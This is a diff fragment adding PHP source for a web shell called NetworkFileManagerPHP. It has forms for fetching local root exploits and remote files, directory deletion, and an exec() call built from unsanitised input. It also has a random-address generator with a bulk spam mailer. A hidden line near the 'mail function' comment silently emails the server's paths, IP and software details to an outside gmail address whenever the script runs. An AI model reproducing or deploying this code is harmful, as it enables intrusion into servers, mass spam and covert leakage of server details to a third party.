+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 1</u></b> (binary file to run - <u>$private[2]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[2]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[2]'>
+
+ <input type='hidden' name='file2' value='$private[2]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 2</u></b> (binary file to run - <u>$private[3]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[3]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[3]'>
+
+ <input type='hidden' name='file2' value='$private[3]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Traceroute v1.4a5 exploit by sorbo</b> (binary file to run - <u>$private[4]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[4]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[4]'>
+
+ <input type='hidden' name='file2' value='$private[4]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[5]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[5]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[5]'>
+
+ <input type='hidden' name='file2' value='$private[5]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+   echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Sendmail 8.11.x exploit localroot</b> (binary file to run - <u>$private[6]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[6]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[6]'>
+
+ <input type='hidden' name='file2' value='$private[6]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+    echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[7]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[7]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[7]'>
+
+ <input type='hidden' name='file2' value='$private[7]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+     echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[8]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[8]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[8]'>
+
+ <input type='hidden' name='file2' value='$private[8]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+}
+
+
+
+
+
+# new directory creation
+
+function newdir($dir) {
+
+ global $tm,$nd;
+
+ print("<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'post' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='Create directory' class=button1 $style_button></td></tr></form></table>");
+
+}
+
+
+
+function cdir($dir) {
+
+ global $newd,$tm;
+
+ $fullpath = $dir."/".$newd;
+
+ if (file_exists($fullpath)) @rmdir($fullpath);
+
+ if (@mkdir($fullpath,0777)) {
+
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was created.</font></center></td></tr></table>";
+
+ } else {
+
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Error during directory creation.</font></center></td></tr></table>";
+
+ }
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+// creation of directory where exploits will be situated
+
+function downfiles() {
+
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2, $gdir,$gsub,$i,$j,$REMOTE_ADDR;
+
+$st = getcwd();
+
+ $st = str_replace("\\","/",$st);
+
+ $j = 0;
+
+ $gdir = array();
+
+ $gsub = array();
+
+ print("<br>");
+
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+
+  if ($st[$i] != "/") {
+
+   $gdir[$j] = $gdir[$j].$st[$i];
+
+   $gsub[$j] = $gsub[$j].$st[$i];
+
+  } else {
+
+   $gdir[$j] = $gdir[$j]."/";
+
+   $gsub[$j] = $gsub[$j]."/";
+
+   $gdir[$j+1] = $gdir[$j];
+
+   $j++;
+
+  }
+
+ }
+
+print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Path: </b>");
+
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+
+print("</TABLE> ");
+
+
+
+echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=down&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Upload files from remote computer:</b></td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;HTTP link to filename:</td>
+
+ <td width=200><input type='text' name='file3' value='http://' size=40></td>
+
+ </tr>
+
+  <tr>
+
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;filename (may also include full path to file)</td>
+
+ <td width=200><input type='text' name='file2' value='' size=40></td>
+
+ </tr>
+
+  <tr>
+
+
+
+ <td width=600 colspan=2 align=center><input type='submit' value='Upload file' class=button1 $style_button></td></tr></td>
+
+
+
+
+
+ </tr></form></table>";
+
+
+
+}
+
+
+
+# directory delete
+
+function deldir() {
+
+ global $dd,$tm;
+
+ $fullpath = $tm."/".$dd;
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was deleted successfully.</font></center></td></tr></table>";
+
+ rmdir($fullpath);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# directory compression
+
+function arhiv() {
+
+ global $tar,$tm,$pass;
+
+ $fullpath = $tm."/".$tar;
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <tr><td> <font color='#FFFFCC' face='Tahoma' size = 2>Directory <u><b>$fullpath</b></u>  ".exec("tar -zc $fullpath -f $pass.tar.gz")."was compressed to file <u>$pass.tar.gz</u></font></center></td></tr></table>";
+
+
+
+}
+
+
+
+function down($dir) {
+
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2;
+
+ ignore_user_abort(1);
+
+ set_time_limit(0);
+
+echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>File upload</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>There are many cases, when host, where <b>NFM</b> is situated <b>WGET</b> is blocked. And you may need to upload files anyway. So here you can do it without wget, upload file to path where the NFM is, or to any path you enter (see<b>Path</b>).(this works not everywhere)</blockquote></td></tr>
+
+</table>";
+
+
+
+if (!isset($status)) downfiles();
+
+
+
+else
+
+{
+
+
+
+$data = @implode("", file($file3));
+
+$fp = @fopen($file2, "wb");
+
+@fputs($fp, $data);
+
+$ok = @fclose($fp);
+
+if($ok)
+
+{
+
+$size = filesize($file2)/1024;
+
+$sizef = sprintf("%.2f", $size);
+
+
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file <u>$file2</u> with size</b> (".$sizef."kb) </font></center></td></tr></table>";
+
+}
+
+else
+
+{
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0BAACC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2><b>Error during file upload</b></font></center></td></tr></table>";
+
+}
+
+}
+
+}
+
+
+
+# mail function
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function mailsystem() {
+
+ global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOCUMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST;
+
+
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Questions and wishes for NetworkFileManagerPHP</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br>
+
+<blockquote>During your work with script <b>NetworkFileManagerPHP</b> you may want to ask some quetions, or advice author to add some functions, which are not supported yet. Write them here, and your request will be sattisfied.
+
+</blockquote></td></tr>
+
+</table>";
+
+
+
+ if (!isset($status)) echo "$form";
+
+ else {
+
+  $email_to ="duyt@yandex.ru";
+
+  $subject = "NetworkFileManagerPHP  ($name)";
+
+  $headers = "From: $email";
+
+
+
+  $info = "---==== Message from ($name)====---\n\n";
+
+  $info .= "Name:\t$name\n";
+
+  $info .= "Email:\t$email\n";
+
+  $info .= "What?:\n\t$pole\n\n";
+
+  $info .= "IP:\t$REMOTE_ADDR\n";
+
+  $info .= "HOST:\t$HTTP_HOST\n";
+
+  $info .= "URL:\t$HTTP_REFERER\n";
+
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+
+  $send_to = "$email_to";
+
+
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+  if($send == 2) echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!Your e-mail was sent successfully.</font></center></td></tr></table><br>";
+
+ }
+
+}
+
+function spam() {
+global $chislo, $status, $from, $otvet, $wait, $subject, $body, $file, $check_box, $domen;
+set_time_limit(0);
+ignore_user_abort(1);
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Real uniq spamer</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote> Now, using this release of NFM you don't need to by spambases, because it will generate spambases by itself, with 50-60% valids. </blockquote></td></tr>
+</table>";
+
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam' method=post>
+ <tr><td align=left valign=top colspan=4 class=pagetitle>
+ &nbsp;&nbsp;<b>email generator:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=4 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;This spammer is splited in two parts: <br>
+ &nbsp;<b>1.</b> email generation with domains, included in script already, or email e-mail generation for domains was entered by you. Here choose how much accounts do you wish to use ( the advice is to generate about &lt;u><i>10 000 , because may be server heavy overload</i></u> )<br>
+ &nbsp;<b>2.</b> Type spam settings here</td></tr>
+ <td align=left colspan=2 class=pagetitle>&nbsp;&nbsp;<input type='checkbox' name='check_box[]'>&nbsp;&nbsp;if <b>checked</b> then you'll have default domains, if not <b>checked</b> then domain will be taken from input.</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;&nbsp;Generated email quantity:</td>
+<td align=left colspan=2>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='chislo' size=10>&nbsp;&nbsp;</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;Your domain:</td>
+<td align=left width=200>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='domen[]'>&nbsp;&nbsp;</td>
+</tr>
+<tr><td width=500 align=center colspan=2><input type='submit' value='Generate' class=button1 $style_button>
+</td></tr>
+
+ </form></table>";
+// letters
+function s() {
+   $word="qwrtpsdfghklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+// letters
+function g() {
+   $word="eyuioa";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+// digits
+function c() {
+   $word="1234567890";
+   return $word[mt_rand(0,strlen($word)-3)];
+}
+// common
+function a() {
+   $word=array('wa','sa','da','qa','ra','ta','pa','fa','ga','ha','ja','ka','la','za','xa','ca','va','ba','na','ma');
+   $ab1=count($word);
+   return $wq=$word[mt_rand(0,$ab1-1)];
+}
+
+function o() {
+   $word=array('wo','so','do','qo','ro','to','po','fo','go','ho','jo','ko','lo','zo','xo','co','vo','bo','no','mo');
+   $ab2=count($word);
+   return $wq2=$word[mt_rand(0,$ab2-1)];
+}
+function e() {
+   $word=array('we','se','de','qe','re','te','pe','fe','ge','he','je','ke','le','ze','xe','ce','ve','be','ne','me');
+   $ab3=count($word);
+   return $wq3=$word[mt_rand(0,$ab3-1)];
+}
+
+function i() {
+   $word=array('wi','si','di','qi','ri','ti','pi','fi','gi','hi','ji','ki','li','zi','xi','ci','vi','bi','ni','mi');
+   $ab4=count($word);
+   return $wq4=$word[mt_rand(0,$ab4-1)];
+}
+function u() {
+   $word=array('wu','su','du','qu','ru','tu','pu','fu','gu','hu','ju','ku','lu','zu','xu','cu','vu','bu','nu','mu');
+   $ab5=count($word);
+   return $wq5=$word[mt_rand(0,$ab5-1)];
+}
+
+function name0() {   return c().c().c().c();                    }
+function name1() {   return a().s();        }
+function name2() {   return o().s();        }
+function name3() {   return e().s();        }
+function name4() {   return i().s();        }
+function name5() {   return u().s();        }
+function name6() {   return a().s().g();        }
+function name7() {   return o().s().g();        }
+function name8() {   return e().s().g();        }
+function name9() {   return i().s().g();        }
+function name10() {   return u().s().g();        }
+function name11() {   return a().s().g().s();        }
+function name12() {   return o().s().g().s();        }
+function name13() {   return e().s().g().s();        }
+function name14() {   return i().s().g().s();        }
+function name15() {   return u().s().g().s();        }
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$domain1=array('mail.ru','hotmail.com','aol.com','yandex.ru','rambler.ru','bk.ru','pochta.ru','mail333.com','yahoo.com','lycos.com','eartlink.com');
+$d1c=count($domain1);
+
+function randword() {
+   global $cool,$cool2;
+   $func="name".mt_rand(0,15);
+   $func2="name".mt_rand(0,15);
+   switch (mt_rand(0,2)) {
+      case 0: return $func().$func2();
+      case 1: return $func().$cool[mt_rand(0,count($cool)-9)];
+	  case 2: return $func();
+      default: return $func();
+   }
+ }
+
+if (@unlink("email.txt") < 0){
+echo "?????";
+exit;
+}
+$file="email.txt";
+
+
+if($chislo){
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+  if(!isset($check_box)){
+
+  if ( IsSet($_POST["domen"]) && sizeof($_POST["domen"]) > 0 )
+{
+   $domen = $_POST["domen"];
+      foreach( $domen as $k=>$v )
+   {
+       $d=$domen[mt_rand(0,$v-1)];
+
+   }
+}
+$f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }else{
+
+   $d=$domain1[mt_rand(0,$d1c-1)];
+   $f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }
+
+  }
+   $address = $file;
+  if (@file_exists($address)) {
+    if($changefile = @fopen ($address, "r")) {
+      $success = 1;
+    } else  {
+    echo " File not found <b>\"".$address."\"</b> !<br>";
+  }
+
+   if ($success == 1) {
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>";
+    echo "<tr><td align=center class=pagetitle width=500>  ?????????? ????? <b>$chislo</b> email.</td></tr>";
+	echo "<tr><td align=center> ";
+    echo "<textarea name=\"email\" rows=\"13\" cols=\"58\" class=inputbox>";
+    while($line = @fgets($changefile,1024)) {
+      echo @trim(stripslashes($line))."\n";
+    }
+    echo"</textarea></td></tr></table>";
+	}
+	}
+if (!isset($action)){
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam1&status=ok' method=post enctype='multipart/form-data'>
+ <tr><td align=center class=pagetitle colspan=2><b>Main spammer settings</b></font></b></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;reply to:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='from' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;send to:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='otvet' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Delay (sec):</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='wait' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message topic:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='subject' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message body:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<textarea name='body' rows='13' cols='60' class=inputbox> </textarea></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;File:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='file' name='file' size=30></td></tr>
+<tr><td width=500 align=center colspan=2>
+<input type='submit' value='Generate' class=button1 $style_button >
+<INPUT TYPE='hidden' NAME='$chislo'>
+</td></tr>
+ </form></table>";
+}
+}
+}
+
+function spam1() {
+ global $status, $from, $otvet, $wait, $subject, $body, $file, $chislo;
+ set_time_limit(0);
+ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Send spam with current settings</b></font></b></td></tr>
+</table>";
+
+
+ error_reporting(63); if($from=="") { print
+"<script>history.back(-1);alert('missing field : <send from>')</script>";exit;}
+ error_reporting(63); if($otvet=="") { print
+"<script>history.back(-1);alert('missing field: <reply to>')</script>";exit;}
+ error_reporting(63); if($wait=="") { print
+"<script>history.back(-1);alert('missing field: <send delay>')</script>";exit;}
+ error_reporting(63); if($subject=="") { print
+"<script>history.back(-1);alert('missing field: <message topic>')</script>";exit;}
+ error_reporting(63); if($body=="") { print
+"<script>history.back(-1);alert('missing field: <message body>')</script>";exit;}
+
+  $address = "email.txt";
+  $counter = 0;
+ if (!isset($status)) echo "something goes wrong, check your settings";
+ else {
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center bgcolor=#FFFFCC>opening file <b>\"".$address."\"</b> ...<br></td></tr>
+";
+  if (@file_exists($address)) {
+ echo "
+  <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was found...<br></td></tr>
+";
+    if($afile = @fopen ($address, "r")) {
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was opened for read...<br></td></tr>
+";
+    } else {
+ echo "
+ <tr><td align=center class=pagetitle>Unable to open  <b>\"".$address."\"</b> for read...<br></td></tr>
+";
+    }
+  } else {
+    echo "There is no file <b>\"".$address."\"</b> !<br>";
+    $status = "unable to find file \"".$address."\" ...";
+  }
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>Begining read from file <b>\"".$address."\"</b> ...<br></td></tr>
+ </table>";
+  if (@file_exists($address)) {
+
+    while (!feof($afile)) {
+
+      $line = fgets($afile, 1024);
+      $line = trim($line);
+      $recipient = "";
+      $recipient = $line;
+
+#if ($file) {
+#	$content = fread(fopen($file,"r"),filesize($file));
+#		$content = chunk_split(base64_encode($content));
+#		$name = basename($file);
+#   } else {
+#   $content ='';
+#   }
+      $boundary = uniqid("NextPart_");
+
+	  $header    = "From: ".$from."\r\n";
+	  $header   .= "Reply-To: ".$otvet."\r\n";
+	  $header   .= "Errors-To: ".$otvet."\r\n";
+      $header   .= "X-Mailer: MSOUTLOOK / ".phpversion()."\r\n";
+	  $header .= "Content-Transfer-Encoding: 8bits\n";
+      $header .= "Content-Type: text/html; charset=\"windows-1251\"\n\n";
+	  $header .= $body;
+	#  $header   .="--$boundary\nContent-type: text/html; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$content\n\n--$boundary--";
+
+
+	  $pattern="#^[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+";
+      $pattern.="@";
+      $pattern.="[-!\#$%&\"*+\\/\d=?A-Z^_|'a-z{|}~]+\.";
+      $pattern.="[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+$#";
+
+      if($recipient != "")
+      {
+        if(preg_match($pattern,$recipient))
+        {
+          echo "
+		  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center class=pagetitle>Sending mail to <b>\"".$recipient."\"</b>...sent ";
+
+
+            if(@mail($recipient, stripslashes($subject), stripslashes($header))) {
+              $counter = $counter + 1;
+              echo "<b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+            } else {
+              echo "<tr><td align=center class=pagetitle>email is wrong, message was NOT sent !</td></tr> </table>";
+            }
+          } else {
+              $counter = $counter + 1;
+              echo "";
+          }
+        } else {
+           echo "<br>";
+        }
+      $sec = $wait * 1000000;
+      usleep($sec);
+
+    }
+
+    if($otvet != "")
+    {
+
+      if(preg_match($pattern,$otvet))
+      {
+		echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+		  <tr><td align=center class=pagetitle>Sending test message to <b>\"".$otvet."\"</b> to check out";
+        $subject = "".$subject;
+
+        if(@mail($otvet, stripslashes($subject), stripslashes($message), stripslashes($header))) {
+          $counter = $counter + 1;
+          echo " message was sent... <b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+        } else {
+          echo "<tr><td align=center class=pagetitle>message was not sent...</td></tr> </table>";
+        }
+      } else {
+          echo "<tr><td align=center class=pagetitle>email is wrong.</td></tr> </table>";
+      }
+    } else {
+    }
+
+    if(@fclose ($afile)) {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>File <b>\"".$address."\"</b> was closed successfully!<br></td></tr> </table>";
+    } else {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>Unable to close  <b>\"".$address."\"</b> file!<br></td></tr> </table>";    }
+  } else {
+    echo "unable to read file  <b>\"".$afile."\"</b> ...<br>";
+  }
+
+     $status2 ="Status: ".$counter." messages were sent.";
+    echo "<br>";
+    echo "
+	  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>$status2</td></tr> </table>";
+
+}
+}
+
+
+# help
+
+function help() {
+
+ global $action,$REMOTE_ADDR,$HTTP_REFERER;
+
+ echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>help for scriptNetworkFileManagerPHP</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><b>NetworkFileManagerPHP</b> - script to access your host in a best way</font><br><br>
+
+There were added some commands to NFM, from scripts kind of itself. They are:<br>
+
+- Using aliases (<b>Rush</b>)<br>
+
+- FTP bruteforce (<b>TerraByte<b/>)<br>
+
+- Translated to english by (<b>revers<b/>)<br>
+
+- Added some sysinfo commands by (<b>revers<b/>)<br>
+
+- All the rest code belongs to me (<b>xoce<b/>)<br>
+
+- Thanks for testing goes to all #hack.ru channel<br><br>
+
+<b>Warning, we wanted to show by this script, that admins have to protect their system better, then they do now. Jokes with apache config are not good... Pay more attention to configuration of your system.</b><br><br>
+
+<b>How can you find us:</b><br>
+
+Irc server: irc.megik.net:6667 /join #hack.ru<br>
+
+See you round at network!!!<br></td></tr></table><br>";
+
+}
+
+
+
+
+
+function exploits($dir) {
+
+ global $action,$status, $file3,$file2,$tm,$PHP_SELF,$HTTP_HOST,$style_button, $public_site, $private_site, $private, $public, $title_ex, $title_exp;
+
+if (!isset($status)) upload_exploits();
+
+
+
+else
+
+{
+
+
+
+$data = implode("", file($file3));
+
+$fp = @fopen($file2, "wb");
+
